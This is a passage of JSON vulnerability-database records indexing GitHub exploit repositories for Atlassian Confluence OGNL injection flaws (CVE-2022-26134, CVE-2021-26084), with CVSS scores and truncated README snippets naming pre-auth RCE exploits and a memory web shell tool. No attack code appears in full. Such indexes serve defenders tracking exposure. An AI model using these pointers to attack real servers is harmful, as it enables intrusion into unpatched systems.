"54DD3775-9F3C-54DF-93EF-372304E8EE4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T09:05:58", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\n\nIn affected ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T11:49:48", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-22T06:59:37", "id": "1F9C946C-1533-5835-B5E8-641EF4FFC145", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:57:19", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T21:26:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-12T22:09:30", "id": "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T20:01:10", "description": "# Confluence-CVE-2022-26134\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:51:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T01:29:57", "id": "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-05T04:58:35", "description": "# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T23:01:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-05T01:06:00", "id": "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:56", "description": "# CVE-2022-26134-POC\nCVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T18:32:35", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:59", "id": "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-26T15:36:52", "description": "# ConfluentPwn\nConfluence pre-auth ONGL injection remote code ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T04:53:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-26T13:24:44", "id": "83B145E2-F995-5B1C-863E-164839ED1173", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T22:57:56", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-22T17:49:52", "id": "12691014-3333-5741-80A4-3357BD72D2AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:38", "description": "\u6279\u91cf\u9a8c\u8bc1 CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T05:46:48", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-05T09:29:34", "id": "2444574D-533F-593F-8E0E-68EA2B47EF55", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T08:06:13", "description": "pip3 install -r require...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T12:24:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-13T05:27:44", "id": "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:07", "description": "# exploit_CVE-2022-26134\nCVE-2022-26134, an OGNL injection vulne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T08:57:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T09:07:45", "id": "02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-11T03:10:59", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T21:07:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-11T02:20:47", "id": "8F6AEAF4-2161-55F7-96CB-003251BDC309", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-08T05:05:12", "description": "# CVE-2022-26134-Godzilla-MEMSHELL\n\n## Usage\n```\njava -jar CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T09:19:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-08T01:54:36", "id": "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T03:11:18", "description": "# CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection\n### U...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:45:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-08T09:54:38", "id": "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T18:09:02", "description": "* CVE-2021-26084\n--------\n** Description\n - POC of CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T06:29:51", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-19T15:09:22", "id": "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T18:51:38", "description": "# ConfluCHECK\nPython 3 script to identify CVE-2021-26084 via net...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-23T19:45:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-24T19:02:52", "id": "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:51", "description": "# CVE-2021-26084-Confluence-OGNL\nasjhdsajdlksavksapfokaajsdlksaj...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-06T06:55:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-06T06:58:34", "id": "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-31T12:14:59", "description": "# CVE-2021-26084 - Confluence Server Webwork OGNL injection\n\n- A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:15:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-31T09:15:01", "id": "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:01", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:45:54", "description": "# CVE-2021-26084\nThis i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-02T07:05:23", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T07:07:25", "id": "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:25:08", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 